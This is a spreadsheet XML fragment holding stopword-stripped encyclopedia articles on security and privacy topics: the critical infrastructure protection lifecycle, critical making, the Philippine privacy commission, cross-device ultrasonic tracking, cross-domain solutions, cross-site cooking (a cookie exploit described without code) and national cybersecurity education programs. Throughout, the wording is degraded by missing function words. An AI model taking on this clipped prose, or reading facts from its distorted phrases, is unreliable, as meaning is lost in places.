mitigation phase comprises actions taken event response warnings incidents. critical asset owners, sectors, installations, military operators take actions minimize operational impact critical asset's loss debilitation. incident response (occurs event) incident response comprises plans activities taken eliminate cause source infrastructure event. reconstitution (occurs event) last phase life cycle, involves actions taken rebuild restore critical asset capability damaged destroyed. this phase challenging least developed process.effective management life cycle ensures protection activities coordinated reconciled among sectors. many ways, cip, risk management imperative. achieving success means obtaining mission assurance. missing mark mean mission failure well human material losses. critical infrastructure protection, risk management requires leveraging resources address critical infrastructure assets also vulnerable greatest threat exposure. important part lifecycle phase because crucial target right assets infrastructure protection, determining assets first phase life cycle. this phase, analysis assessment, foundation seven lifecycle activities. without solid foundation, remaining life cycle phases flawed, resulting plan fails protect critical infrastructure and, therefore, mission assurance. phase analysis assessment phase determines assets important, identifies vulnerabilities, dependencies decision makers information need make effective risk management choices. defense infrastructure, organized sectors. each sector composed assets, systems, programs, people, equipment, facilities. assets simple, facility within geographic location, complex, involving geographically dispersed links nodes. analysis assessment made five steps include activities span encompass sectors assets. first step analysis assessment phase identify critical assets. asset's criticality function time situation based asset's operational business value. value depends several factors: first, military operations services rely asset dependencies change across time next, sensitive operation loss compromise asset, words maximum allowable time asset compromised. finally, asset's assurance profile particular whether asset restoration switch backup occur within allowable time. through domain expertise inspection, critical assets identified reported program. second step analysis assessment phase defense infrastructure characterization. this step maps associates critical asset functions relationships within sector. iii. third step analysis assessment phase operational impact analysis. this step accomplished development operational dependency matrices application operations research methods. potential operational impacts service-level requirements reflected asset's criticality attributes criticality index program. fourth step vulnerability assessment. this step accomplished multiple channels. through program, critical assets baseline vulnerability index, calculated inputs associated class asset geographic region probability natural disasters, criminal national security events, technological failures. asset owners, host installations, sector ciao, entities provide asset operational readiness emergency preparedness information. fifth final step analysis assessment phase interdependency analysis. interdependency analysis seeks functions relationships among sectors. result interdependency analysis, criticality attributes previously identified assets updated additional critical assets identified program. multiple groups within structure perform analysis assessment activities. translating analysis assessment process concrete data requires specific activities, tasks, tools. phase example “real world” august 2001, director joint staff requested uspacom serve lead support combatant command creating first-ever theater plan known “cip appendix plan”. following uspacom approached task. uspacom focused analysis assessment phase organizing activities answer three major questions: what critical? vulnerable? what done?to answer question, “what critical?”, uspacom outlined three-step procedure: first, identify project focus. second, complete operational analysis. third, complete defense infrastructure analysis.to accomplish steps, uspacom adopted methodology focuses efforts tier assets. tier assets assets could cause mission failure compromised damaged. methodology uapacom adopted modified mission area analysis, maa. links combatant command missions infrastructure assets critical given operations plan, oplan, contingency plan, conplan, crisis action plan. typically, process determines assessment site priorities. uspacom modified process selected assessment sites installations prior conducting maa. following illustration uspacom process: first, identified mission essential requirements, mers, specific combatant commands joint task force capabilities essential execution warfighting plan. then, created matrix specific command. example, provide command, control, communications, computers, second, identified forces required mer. example, linked specific signal battalion. third, linked forces necessary functions tasks supporting force. example, signal battalion linked communications civil engineers functions task managing theater's information systems requirements. third, links assets functions supporting tasks. result mission area analysis mission-critical assets.uspacom uses data gathers scope focus efforts truly mission-critical assets answer next question process, vulnerable? first step answering question complete installation analysis. next step complete commercial infrastructure analysis. uspacom relied upon different organizations assessments: balanced survivability assessments, bsas, mission assurance assessments. two-week mission-focused assessment military installation designated site. mission assurance assessment unique uses area assessment approach focus commercial military asset vulnerabilities dependencies. final step determine vulnerabilities integrate analyses assessments. with critical assets vulnerabilities identified, uspacom ready perform risk management activities decide done protect mission-critical assets. booz allen hamilton developed process pacom. phase remediation first phase life cycle, analysis assessment, identified critical assets sector infrastructures vulnerabilities weaknesses critical assets. second phase remediation phase. remediation phase, known weaknesses vulnerabilities addressed. remediation actions deliberate, precautionary measures designed known virtual physical vulnerabilities event occurs. purpose remediation improve reliability, availability, survivability critical assets infrastructures. remediation actions apply type vulnerability, regardless cause. they apply acts nature, technology failures, deliberate malicious actions. cost remediation action depends nature vulnerability addresses. defense infrastructure sector assurance plan infrastructure sector must develop, establishes priorities resources remediation. remediation requirements determined multiple factors. these analysis assessment, input military planners sectors, national infrastructure assurance plan plans, reports, information national infrastructure vulnerabilities remediation, well intelligence estimates assessments threats. remediation requirements also gathered lessons learned defense infrastructure sector monitoring reporting infrastructure protection operations exercises. program tracks status remediation activities critical assets. remediation activities protect critical defense infrastructure cross multiple department components. phase indications warnings need monitor activities warn potential threats united states new. from conventional assaults potential nuclear attacks, military forefront monitoring warning potential dangers since founding country. protecting security well united states, including critical defense infrastructure, entered era. deemed essential coordinated ability identify warn potential actual incidents among critical infrastructure domains. ability detect warn infrastructure events third phase critical infrastructure protection life cycle, indications warnings phase. indications warnings actions infrastructure conditions signal event either: likely, planned underway.historically, event indications focused relied intelligence information foreign developments. these event indications expanded include potential infrastructure disruption degradation, regardless cause. indications based four levels input: tactical level input asset owners installations operational-level input sector chief information assurance officers (ciaos) theater-level input command service intelligence counter-intelligence activities. strategic-level intelligence intelligence community, enforcement, private sectorthis fusion traditional intelligence information sector-specific information determined essential meaningful indications. indication detected, warning notifying appropriate asset owners possible occurring event hazard issued. sector's assurance plan determines conditions actions monitored reported defense infrastructure sector. each sector must develop written defense sector assurance plan includes compendium sector incidents monitoring reporting. sector incident compendium made three types incidents: nationally defined reportable incidents defined reportable incidents, sector-defined reportable incidents.dod critical asset owners, installations, sector ciaos determine sector-defined incidents. </t>
  </si>
  <si>
    <t>Critical making</t>
  </si>
  <si>
    <t>critical making refers hands-on productive activities link digital technologies society. invented bridge creative, physical, conceptual exploration. purpose critical making resides learning extracted process making rather experience derived finished output. term "critical making" popularized matt ratto, associate professor university toronto. ratto describes main goals critical making material forms engagement technologies supplement extend critical reflection and, reconnect lived experiences technologies social conceptual critique." "critical making", defined practitioners like matt ratto stephen hockema, elision typically disconnected modes engagement world "critical thinking," often considered abstract, explicit, linguistically based, internal cognitively individualistic; "making," typically understood tacit, embodied, external, community-oriented." history critical making matt ratto critical making matt ratto coined term 2008 describe workshop activities linked conceptual reflection technical making. this concept explores learning influenced learner's participation towards creating and/or making things within technological context. ratto's first publication term 2009. ratto claims goal connect conceptual understanding technology social life materialized activities. situating within area "design-oriented research" rather "research-oriented research," ratto believes critical making enhances shared experience theoretical practical understandings critical socio-technical issues. however, critical making reviewed design, rather type practice. quality critical making evaluated based physical "making" process, regardless quality final material production. prior studies noted separation critical thinking physical "making". specifically, experts technology lack knowledge art, vice versa. however, important technology embedded context rather left isolation, especially comes critical making. critical making founded matt ratto faculty information, university toronto. critical making provides participants tools basic knowledge digital technology used critical making. mission enhance collaboration, communication, practice-based engagement critical making.the main focus critical making open design. open design develops critical perspective current institutions, practices, norms society, reconnecting materiality morality. matt ratto introduces critical making processes material conceptual exploration creation novel understandings makers themselves. critical making includes digital software hardware. software usually refers raspberry arduino. hardware refers computer, device facilitates operation. eric paulos critical making 2012, eric paulos launched critical making studio course berkeley. this critical making course designed operationalize critique practice “making” foundational literature hands-on studio culture. hybrid practitioners, students develop fluency readily collaging incorporating variety physical materials protocols practice. with design research lens, students envision create future computational experiences critically explore social culturally relevant technological themes community, privacy, environment, education, economics, energy, food, biology, democracy, activism, healthcare, social justice, etc. course offered continuously since 2012 featured publicly showcases exhibitions, including maker faire well public venues. selected projects archived online course website. garnet hertz critical making 2012, garnet hertz adopted term series handmade booklets titled "critical making," published 2012. explores hands-on productive work making supplement extend critical reflection technology society. works blend extend fields design, contemporary art, diy/craft, technological development. project, different authors including norman white, julian bleecker, dunne raby, daniel charny, albert borgmann, golan levin, matt ratto, natalie jeremijenko, mckenzie wark, paul dourish, mitch altman, dale dougherty, mark pauline, scott snibbe, reed ghazala others reflected term critical responses maker movement. generally speaking, hertz's term critical making focused around studio production creation objects "things think with".hertz's project consisted academic papers, detailed technical projects, interviews, documented pieces artwork. categorized information specific topics, thereby producing multiple booklets. booklet testament critical making. printed using hacked photocopier, roughly 100,000 pages manually folded stapled create copies booklets each. publication asks look aspects culture beyond buying arduino, getting printer, projects weekend hobby. these books embrace social issues, history technology, activism, politics. project also stemmed specific disappointment make partnering military darpa funding 2012. many opposed move, including mitch altman, hertz's project worked explore mixture making, technology, politics ethics well bringing fields critical design media arts conversation maker culture. 2014, hertz founded "the studio critical making" emily carr university design canada research chair design media arts. facility "explores humanities-based modes critical inquiry like arts ethics directly applied building engaging product concepts information technologies. works replace traditional engineering goals efficiency, speed, usability complex cultural, social, human-oriented values. result technology culturally relevant, socially engaged, personalized." other uses critical making 2012, john maeda began using term rhode island school design (risd): first title strategic plan 2012-2017 next part title edited collection titled "the critical making: rhode island school design creative practice" published john wiley sons, inc. other individuals term critical making orient work include amaranth borsuk (university washington-bothell), jentery sayers (university victoria), roger whitson (washington state university), kari kraus (university maryland), papaelias (suny-new paltz), jessica barness (kent state university). concepts related critical making critical making traditional criticized costs standards. products difficult spread lower-income areas issues cost ease commonly cited (williams, 276). lifestyle choice also technological product. "diy activity not, example, seen coping practice used unable afford externalize activity formal firms and/or self-employed individuals. instead, reflecting broader cultural turn retail studies, explanation engagement firmly grounded human agency" (williams, 273). speculative design critical making according disalvo lukens, "speculative design approach design emphasizes inquiry, experimentation, expression, usability, usefulness desirability. particular characteristic speculative design tends future-oriented. however, mistaken fantasy-like sense, suggesting "unreal" therefore dismissible (disalvo lukens, 2009)."the term speculative design involves practices various disciplines, including visionary futurist forms architecture, design fiction, critical design design debate instead referring specific movement style. more diagrams unbuilt structures, speculative design aims explore space interaction culture, technology, built environment (lukens disalvo, 2012, 25). practitioners speculative design engage design sort provocation, asks uncomfortable questions long-term implications technology. these practices also integrate pairs concerns traditionally separate, fact fiction, science art, commerce academia. this provocation extends questions design itself. also critical technical practice critical thinking critical design speculative design maker culture technology arduino printing references external links arduino open design raspberry arduino critical making paulos syllabus (berkeley) critical making hertz (2012) studio critical making (emily carr university design) john maeda: critical making</t>
  </si>
  <si>
    <t>National Privacy Commission (Philippines)</t>
  </si>
  <si>
    <t>national privacy commission, npc, independent body created republic 10173 data privacy 2012, mandated administer implement provisions act, monitor ensure compliance country international standards data protection. attached philippines' department information communications technology (dict) purposes policy coordination, remains independent performance functions. commission safeguards fundamental human right every individual privacy, particularly information privacy ensuring free flow information innovation, growth, national development.in order fulfill mandate, commission vested broad range powers, receiving complaints instituting investigations matters affecting personal data protection compelling entities abide orders matters affecting data privacy. also represents philippine government internationally data protection related issues. commission formulates implements policies relating protection personal data, including relevant circulars advisory guidelines, assist organisations understanding complying data privacy act. commission also reviews organizational actions relation data protection rules issue decisions directions compliance necessary. mandated work relevant sector regulators exercising functions. beyond regulating data protection issues, also undertakes public sector-specific educational outreach activities help organizations adopt good data protection practices help individuals better understand protect personal data misuse. history data privacy 2012 first philippines acknowledges rights individuals personal data enforcing responsibilities entities process them. initial definition offered first republic 8792, section better known ecommerce philippines formally introduced department trade industry (dti) department administrative order defining guidelines protection personal data information private sector. along anti-cybercrime bill (now 10175), first draft started 2001 legal regulatory committee former information technology ecommerce council (itecc) forerunner commission information communication technology (cict). headed former secretary virgilio "ver" peña committee chaired atty. claro parlade. initiative information security privacy sub-committee chaired albert dela cruz president phcert together anti-computer crime fraud division chief, atty. elfren meneses nbi. administrative operational functions provided presidential management staff (pms) acting cict secretariat. with rising concerns information technology business process association philippines (ibpap) absence data privacy law, philippine congress passed senate bill 2965 house bill 4115 june 2012. president benigno aquino signed republic 10173 data privacy 2012 august 2012. influenced data protection directive apec privacy framework.president aquino appointed march 2016 raymund liboro inaugural head commission damian domingo mapa patdu inaugural deputy privacy commissioners. with fixed terms office, continued roles administration president rodrigo duterte. after consultation various private organizations, civil societies series public hearings manila, cebu davao, implementing rules regulations data privacy signed august 2016. took effect september 2016.in 2016, commission formally investigated commission elections commission elections data breach largest security breach government held personal data. february 2017, announced commission elections investigated another security breach alleged theft computer containing personal data voters.the also began coordinating different sectors privacy data protection. 2016, national privacy commission accepted member international conference data protection privacy commissioners asia pacific privacy authorities. commissioners current commissioners past commissioners also list data protection authorities country references resources national privacy commission national privacy commission facebook national privacy commission instagram national privacy commission twitter national privacy commission's channel youtube republic 10173: data privacy 2012</t>
  </si>
  <si>
    <t>National Institute of Cryptology Research and Development</t>
  </si>
  <si>
    <t>national institute cryptology research development (nicrd) national-level research center cryptologic education research. history institute established 2007 hyderabad. institutes comes purview national technical research organisation. national critical information infrastructure protection centre. envisoned house simulation laboratories, digital fortress laboratories financial security design. and, develop encryption products national security-related critical applications. references</t>
  </si>
  <si>
    <t>Trusted Information Systems</t>
  </si>
  <si>
    <t>CronLab</t>
  </si>
  <si>
    <t>cronlab limited privately held limited company provides information security filtering software businesses public either directly integration third party products. cronlab offices london, united kingdom gothenburg, sweden. history cronlab founded gothenburg, sweden introduced first anti-spam hardware appliances 2009. "cronlab light 1100 anti-spam appliance review", pro, march 2011, retrieved april 2012 magazine, magazine, 2010, company moved headquarters london, united kingdom. also released software service hosted models spam filtering technology awarded recommendation techworld, hosted email archiving solutions.cide group, manufacturer, partnered cronlab development children's tablet computer. tablet, called "kurio", features cronlab's hosted web-filtering parental controls technology. cronlab agreements distribution france, belgium, switzerland, germany, norway, bulgaria, moldova, romania, ireland united kingdom.the company's security products protect email threats spam, spyware, trojans viruses, also provide email archiving solution. cronlab's products support multi-tenancy marketed isps, msps consultants. their products also white labelled. references</t>
  </si>
  <si>
    <t>National Initiative for Cybersecurity Education</t>
  </si>
  <si>
    <t>national initiative cybersecurity education (nice) partnership government, academia, private sector focused supporting country's ability address current future cybersecurity education workforce challenges standards best practices. nice national institute standards technology (nist) u.s. department commerce. history comprehensive national cybersecurity initiative (cnci), established president george bush january 2008, included twelve initiatives, which, initiative aimed making federal cybersecurity workforce better prepared handle cybersecurity challenges.in 2009, cyberspace policy review, directed president barack obama, elevated cnci initiative initially focused improving federal cybersecurity workforce's ability perform cybersecurity work. scope expanded beyond federal workforce include private sector workforce, truly making national charge. march 2010, obama administration declassified limited material regarding cnci, making initiative public: initiative expand cyber education. while billions dollars spent technologies secure u.s. government cyberspace, people right knowledge, skills, abilities implement technologies determine success. however enough cybersecurity experts within federal government private sector implement cnci, adequately established federal cybersecurity career field. existing cybersecurity training personnel development programs, good, limited focus lack unity effort. order effectively ensure continued technical advantage future cybersecurity, must develop technologically-skilled cyber-savvy workforce effective pipeline future employees. take national strategy, similar effort upgrade science mathematics education 1950s, meet challenge. additionally, cnci described training, education, professional development programs lacking “unity effort”. cybersecurity enhancement 2014 title established “national cybersecurity awareness education program”, known national initiative cybersecurity education (nice). organization nice headquartered nist facilities gaithersburg, maryland. nice program office activities organized three categories: government engagement, industry engagement, academic engagement. also list computer security certifications cyber security standards references external links federal website nice</t>
  </si>
  <si>
    <t>Cross-device tracking</t>
  </si>
  <si>
    <t>cross-device tracking refers technology enables tracking users across multiple devices smartphones, television sets, smart tvs, personal computers.more specifically, cross-device tracking technique technology companies advertisers deploy trackers, often form unique identifiers, cookies, even ultrasonic signals, generate profile users across multiple devices, simply one. example, form tracking uses audio beacons, inaudible sounds, emitted device recognized microphone device.this form tracking used primarily technology companies advertisers information piece together cohesive profile user. these profiles inform predict type advertisements user receives. background there many ways online tracking manifested itself. historically, companies wanted track users' online behavior, simply users sign website. this form deterministic cross-device tracking, user's devices associated account credentials, email username. consequently, user logged company keep running history sites user user interacted computers mobile devices.eventually, cookies deployed advertisers, providing user unique identifier browser user's preferences monitored. this unique identifier informs placement relevant, targeted user receive. cookies also used companies improve user experience, enabling users pick left websites. however, users began using multiple devices––up around five––advertisers became confused track, manage, consolidate data across multiple devices cookie-based model suggested device––whether phone, computer, tablet––was different person.other technologies supercookies, stay computers long user deletes cookies, beacons, unique images url, also used trackers advertisers gain increased insight users' behavior. however, advertisers still limited device able tracked associated user.thus, cross-device tracking initially emerged means generating profile users across multiple devices, simply one. tactic cross-device tracking called browser fingerprinting, occurs browsers, modifiable users' tastes, produce unique signal companies advertisers single user. browser fingerprinting cause concern effectiveness also since allow users opt-out tracking.another tactic used google called adid works smartphones tandem cookies user's computer track behavior across devices.now, cross-device tracking evolved new, radical form surveillance technology enables users tracked across multiple devices, including smartphones, tvs, personal computers audio beacons, inaudible sound, emitted device recognized microphone device, usually smartphone. addition, cross-device tracking presage future internet things (iot), types devices––such offices, cars, homes––are seamlessly interconnected internet. ultrasonic tracking humans interpret sound picking different frequencies. given variety sound waves exist, humans hear frequencies within certain range––generally khz. humans cannot hear sounds khz.ultrasound, shorter wavelengths greater equal khz, enables rapid transmission data necessary cross-device tracking occur.another integral component cross-device tracking usage audio beacons. audio beacons beacons embedded ultrasound, cannot heard humans. these audio beacons used surreptitiously track user's location monitor online behavior connecting microphone another device without user's awareness.in october 2015, center democracy technology submitted comments federal trade commission (ftc) regarding cross-device tracking technology, specifically mentioning silverpush.audio "beacons" embedded television advertisements. similar manner radio beacons, picked mobile apps. this allows behavior users tracked, including seen user long watched changing channel.in march 2016, issued warning letters developers using cross-device tracking apps. warned developers violating state imply apps tracking television viewing habits fact are. applications studies shown android applications eavesdropping ultrasonic channels without user's awareness.applications silverpush, shopkick, lisnr part "ultrasonic side-channel" app, often unbeknownst user, intercepts ultrasonic signals emitted user's environment, track advertisements user heard long person listened them. silverpush––the leading company using technology––patented software enabling track based audio stream shopkick, another popular application, gives discounts users shop stores emit ultrasonic beacons, allowing create profile user lisnr uses user's location data tandem ultrasonic beacons give users coupons related activitiesanother study suggested apple, google, bluetooth special interest groups need prevent cross-device tracking. privacy surveillance concerns ultrasonic tracking cross-device tracking privacy implications allows detailed tracking users traditional tracking methods. data collected multiple devices used single user correlated form accurate picture person tracked. moreover, malicious actors variants technology de-anonymize anonymity network users.ultrasonic tracking technologies pose massive threats user's privacy. there four primary privacy concerns associated form tracking: first media tracking: audio user's television detected microphone user's mobile device, allowing malicious actors gain access user watching––particularly salacious. advertisers similarly gain insight user typically watches. scenarios, user's real-world behavior linked online identity used tracking. another form tracking permitted ultrasonic tracking cross-device tracking, enables user's profile connected across multiple devices based proximity. this form tracking, linking different devices, help advertisers show targeted open individuals attacks malicious actors. location tracking another privacy concern. indeed, ultrasonic signals convey location information location identifier, often placed stores businesses. lastly, ultrasonic tracking poses threat users bitcoin de-anonymizes user's information, since ultrasonic signals associate user's mobile phone bitcoin account. panoptic surveillance commodification users' digital identity from cookies ultrasonic trackers, argue invasive forms surveillance underscore users trapped digital panopticon, similar concept envisioned jeremy bentham: prison prisoners able seen times guards unable detect when, even watched all, creating sense paranoia drove prisoners carefully police behavior. similarly, scholars drawn parallels bentham's panopticon today's pervasive internet tracking individuals lack awareness vast disparities power exist corporation willingly give data. essence, companies able gain access consumers' activity company's services. usage services often beneficial, users agree exchange personal information. however, since users participate unequal environment, corporations hold power user obliged accept faith offers made corporations, users operating environment ultimately controls, shapes molds think behave certain way, depriving privacy.in direct response panoptic invasive forms tracking manifesting within digital realm, turned sousveillance: form inverse surveillance users record surveilling them, thereby empowering themselves. this form counter surveillance, often used small wearable recording devices, enables subversion corporate government panoptic surveillance holding power accountable giving people voice––a permanent video record––to push back government abuses power malicious behavior unchecked.the television, along remote control, also argued conditioning humans habitually repeating enjoy without experiencing genuine surprise even discomfort, critique television similar made information silos social media sites today. essence, technological development egocasting: world people exert extreme amounts control watch hear. result, users deliberately avoid content disagree form––ideas, sounds, images. turn, siloing drive political polarization stoke tribalism. plus, companies like tivo analyze show watchers remote capability skip programming, advertisements––a privacy concern users lack awareness well.some scholars even contended increased surveillance, users participate online active generation curation online images––a form control. doing, users seen rejecting shame associated private lives. other scholars note surveillance fundamentally dependent upon location physical virtual environments. this form surveillance seen travel websites enable user share vacation virtual audience. person's willingness share personal information online validated audience, since audience holds user accountable user vicariously experiences pleasure audience. further, users' mobile data increasingly shared third parties online, potentially underscoring regulatory challenges inherent protecting users' online privacy.in addition, scholars argue users right know value personal data. increasingly, users' digital identity becoming commodified selling monetizing personal data profit large companies. unfortunately, many people appear unaware fact data holds monetary value potentially used towards products services. thus, scholars arguing users' increased awareness transparency process users become empowered informed consumers data. surveillance capitalism increased usage cross-device tracking advertisers indicative rise data extraction analysis form profit, surveillance capitalism, term coined shoshana zuboff. this form capitalism seeks commodify private human experience create behavioral futures markets, behavior predicted behavioral data harvested user. zuboff suggests surveillance capitalism eclipses bentham's panopticon, becoming encroaching invasive unlike prison, escape, thoughts, feelings, actions users immediately extracted commodified resold. thus, since cross-device tracking seeks create profile user across multiple devices, tech companies, google, could behavioral data make predictions user's future behavior without user's awareness.scholars beginning discuss possibility quantifying monetary value users' personal data. notably, algorithms used extract mine user data increasingly seen business assets thus protected trade secrets. indeed, usage free online services, public wi-fi, often comes unknown cost user tracked profiled company providing service. essence, transaction occurring: users' personal data exchanged access free service. increasingly, scholars advocating users' right understand fundamental value personal data intimately savvy, informed consumers ability protect privacy online information manipulated unwittingly giving away personal information. health wellness applications addition, health wellness applications also dearth privacy protections well: study found many health apps lacked encryption regulators enforce stronger data privacy protections. study stated apps tested, none applications locally encrypted users' personal information applications pushed data online. lack adequate privacy security measures surrounding users' personal medical data mobile applications underscores lessening degree users trust mobile developers safeguard personal information online. while mobile application developers continue confront privacy security concerns, users increasingly looking ways visualize data wearable devices applications track workout exercise routines. indeed, researchers discovered self-tracking devices play role tool, toy, tutor users' lives. tool role, self-tracking device functions mechanism help user capacity, often achieve personal health goals. role underscores self-tracking users game, particularly regard rewards viewing visualized data. lastly, tutor role reflects users gain insights motivation activity apps themselves. other scholars characterized self-tracking performing system, controlling isn't) recorded, performing self, tracking gain insight behavior, performing people, importance people viewed person tracked, well control person tracked data thus perceived. cookies, flash cookies, beacons additionally, privacy concerns surround cookies, flash cookies, beacons websites today. ultimately, five main concerns surround usage cookies, flash cookies, beacons, according study: firstly, authors note users lack anonymity online, cookies using unique identifiers flash cookies enabling recognition website visits another concern authors note unintended uses cookies, since cookies initially designed benefit user's experience engagement online, since morphed business advertisers personal data sold profit users likely unaware personal information used, reflecting surreptitious nature data collection some cookies trespass users' resources downloaded user's computer often without user's awareness lastly, authors note threat cookie sharing underscores users' personal information become combined data websites even social security number create cohesive picture user data capitalism other scholars defined similarly extractive destructive phenomenon called data capitalism. data capitalism economic system enabling redistribution power towards access information––namely, corporations. there three fundamental theories large companies engage users virtual communities, reflecting power data capitalism users today: free open network: making products free, large companies make products accessible larger audience extract valuable data exchange. connection people machines: data capitalism promotes connection people machines derived user's relationship technology itself. increasingly, tracking surveillance technology profiling users learning preferences, users become comfortable devices self-fulfilling prophecy continues. value placed data: information asymmetries proliferating exacerbate inequality information allow powerful access people's data. increasingly, scholar suggests lack transparency users' data reflects tension privacy community online. solutions scholars convinced current notice-and-consent model privacy policies fundamentally flawed assumes users intuitively understand facts privacy policy, often case. instead, scholars emphasize imperative role creating culture privacy becomes social norm. effect, users online technologies identify social activities internet start questioning websites' governing norms natural outgrowth browsing. effect, norms need prevent websites collecting sharing users' personal information. addition, starting user's personal values seeing values correlate online norms another assess whether privacy norms violated cases. ultimately, scholars believe privacy norms vital protecting individuals social institutions. legal ethical issues while united states lacks extensive privacy rights, fourth amendment provides privacy protections. fourth amendment states "the right people secure persons, houses, papers, effects, unreasonable searches seizures, shall violated", suggesting individuals protected levels government, legally protected private companies individuals malicious intent.there large implications technology within legal field. legally, federal trade commission responsibility prevent deceptive practices technology companies, could lead consumer injury. made efforts prevent invasive tracking, tracking physical space, malware, insecure poorly designed services, deception engage surveillance. instance, realm invasive tracking, brought lawsuits companies engage 'history sniffing'––a technique enables companies ascertain links user clicked based color link. concerning tracking physical space, also cracked nomi, company scans addresses customers' phones stores. addresses function unique identifier, enabling connection wireless networks. case malware, placed pressure companies cyberspy, self-proclaimed email attachment company claimed secretly record users' presses. also cracked companies like compete, browser toolbar, decrypted users' personal information internet, putting users risk. lastly, cases deception used engage surveillance, investigated private investigators, surveil individuals another person's behalf. addition, audio beacon technology, used application called silverpush, could violate ftc's policies users made aware ultrasonic signals recorded.another scholar believes convergence lived experience online technology creating term called mixed reality, people things replaced virtual experiences. mixed reality technologies pose legal challenges laws govern online world also extend real world. addition, data tagging––often gps, location-based services, even near-field communication (nfc)––is technology heart mixed reality, since people's data determined part location. near-field communication enables devices transmit data certain range. virtual reality become privacy issue attempts immerse users virtual environment recording user's every sensation. turn, mixed reality's amalgamation daily tasks suggest implicated numerous legal issues ranging copyright intellectual property law. customers also denied voice contracts, since corporations rules individuals' private information mined extracted. solution issues, according scholars, opt-in controls police users' privacy enable balance restored law, particularly stands regarding contracts.ethically, zuboff points extraction, commodification, analysis private human experiences well increased surveillance––which sometimes hidden––in everyday life violating users' rights privacy. usage surreptitious methods, user unaware extent tracked, brings tracking mechanisms––such cookies, flash cookies, beacons––into ethical realm well since users informed tracking perhaps often should. also behavioral analytics behavioral targeting internet privacy privacy concerns social networking services surveillance website visitor tracking references external links center democracy technology's letter</t>
  </si>
  <si>
    <t>Cross-domain solution</t>
  </si>
  <si>
    <t>cross-domain solution (cds) integrated information assurance system composed specialized software, sometimes hardware, provides controlled interface manually automatically enable and/or restrict access transfer information security domains based predetermined security policy. cdss designed enforce domain separation typically include form content filtering, used designate information unauthorized transfer security domains levels classification, different military divisions, intelligence agencies, operations critically depend timely sharing potentially sensitive information.the goal allow trusted network domain exchange information domains, either one-way bidirectionally, without introducing potential security threats would normally come network connectivity. although goal 100% assurance, possible practice, thus development, assessment, deployment based comprehensive risk management. sensitive nature use, every aspect accredited must rigorously evaluated known lab-based security assessment (lbsa) order reduce potential vulnerabilities risks system deployed. evaluation accreditation cdss united states primarily authority national cross domain strategy management office (ncdsmo) within national security agency (nsa). three primary elements demanded cross domain solutions are: data confidentiality; often imposed hardware-enforced one-way data transfer data integrity: content management using filtering viruses malware; content examination utilities; high-to-low security transfer audited human review data availability: security-hardened operating systems, role-based administration access, redundant hardware, etc.the acceptance criteria information transfer across domains cross-domain interoperability based security policy implemented within solution. this policy simple (e.g., antivirus scanning whitelist "allowlist"] check transfer peer networks) complex (e.g., multiple content filters human reviewer must examine, redact, approve document release high security domain). unidirectional networks often used move information security domains secret enclaves assuring information cannot escape. cross-domain solutions often include high assurance guard. though cross-domain solutions have, 2019, historically typical military, intelligence enforcement environments, also case cross domain solutions industry. many industrial settings control systems analytic systems are, different security domains. example flight control infotainment systems airliner. given wide variety cases industry, different levels third party accreditation certification aspects cross-domain solution appropriate different applications, found among different providers. types cross domain solutions there three types cross domain solutions (cds) according department defense instruction (dodi) 854001p. these types broken access, transfer, multi-level solutions (mls) must included cross domain baseline list prior department defense specific site implementations. access solution access solution describes user’s ability view manipulate information domains differing security levels caveats. theory, ideal solution respects separation requirements domains preventing overlaps data domains, ensures data differing classifications cannot ‘leak’ (i.e. data spill) networks host layer osi/tcp model. practice, however, data spills ever-present concern system designers attempt mitigate within acceptable risk levels. reason, data transfer addressed separate cds". transfer solution transfer simply offers ability move information security domains different classification level different caveat classification level. transfer solutions must evaluated ensure guard capable respecting constrictions various domains require protection. multi-level solutions "access transfer solutions rely multiple security level (msl) approaches maintain separation domains; architecture considered multiple single levels. multi-level solution (mls) differs architecture storing data single domain. solution uses trusted labeling integrated mandatory access control (mac) schema basis mediate data flow access according user credentials clearance order authenticate read write privileges. manner, considered all-in-one cds, encompassing access data transfer capabilities." unintended consequences previous decades, multilevel security (mls) technologies developed implemented enabled objective deterministic security, left little wiggle room subjective discretionary interpretation. these enforced mandatory access control (mac) near certainty. this rigidity prevented simpler solutions would seem acceptable surface. automated information systems enabled extensive information sharing sometimes contrary need avoid sharing secrets adversaries. need information sharing need depart rigidity favor balancing need protect need share. when ‘balance’ decided discretion users, access control called discretionary access control (dac) tolerant actions manage risk requires risk avoidance. allowing users systems manage risk sharing information contrary original motivation mac. unintended consequences sharing complex analyze necessarily left discretion users narrow focus critical need. these documents provide standards guidance risk management: "recommended security controls federal information systems organizations". computer security division computer security resource center. national institute standards technology (nist). 2011-11-16., 800-53 rev3 "security categorization control selection national security systems" (pdf). committee national security systems (cnss)., instruction 1253 references unified cross domain management office (ucdmo), cross domain overlay, december 2011, 1.0; provides extensive security control guidance implement platform address security controls hardware software, enforced advanced inspections.</t>
  </si>
  <si>
    <t>Cross-site cooking</t>
  </si>
  <si>
    <t>cross-site cooking type browser exploit allows site attacker cookie browser cookie domain another site server. cross-site cooking used perform session fixation attacks, malicious site fixate session identifier cookie another site. other attack scenarios also possible, example: attacker know security vulnerability server, exploitable using cookie. security vulnerability requires e.g. administrator password attacker know, cross-site cooking could used fool innocent users unintentionally perform attack. cross site. cross-site cooking similar concept cross-site scripting, cross-site request forgery, cross-site tracing, cross-zone scripting etc., involves ability move data code different sites cases, e-mail instant messages sites). these problems linked fact browser shared platform different information applications sites. only logical security boundaries maintained browsers ensures site cannot corrupt steal data another. however browser exploit cross-site cooking used move things across logical security boundaries. origins name cross-site cooking concept presented michał zalewski 2006. name "cookie" "cross-site", attempting describe nature cookies across sites. michał zalewski's article 2006, benjamin franz credited discovery, 1998 reported cookie domain related vulnerability vendors. benjamin franz published vulnerability discussed mainly circumvent "privacy protection" mechanisms popular browsers. michał zalewski concluded bug, years later, still present (unresolved) browsers could exploited cross-site cooking. various remarks "vendors [...] certainly hurry this" made zalewski others. references external links cross-site cooking article michal zalewski. details concept, bugs enables cross site cooking. bugs originally found benjamin franz.</t>
  </si>
  <si>
    <t>National Initiative for Cybersecurity Careers and Studies</t>
  </si>
  <si>
    <t>national initiative cybersecurity careers studies (niccs) online training initiative portal built national initiative cybersecurity education framework. this federal cybersecurity training subcomponent, operated maintained cybersecurity infrastructure security agency. history initiative launched janet napolitano, then-secretary homeland security department homeland security february 2013. primary objective initiative develop train next generation american cyber professional involving academia private sector. federal virtual training environment niccs hosts federal virtual training environment, completely free online cybersecurity training system federal state government employees. contains hours training materials ethical hacking surveillance, risk management, malware analysis. also cybersecurity infrastructure security agency national cyber security division national initiative cybersecurity education references</t>
  </si>
  <si>
    <t>Criticism of Facebook</t>
  </si>
  <si>
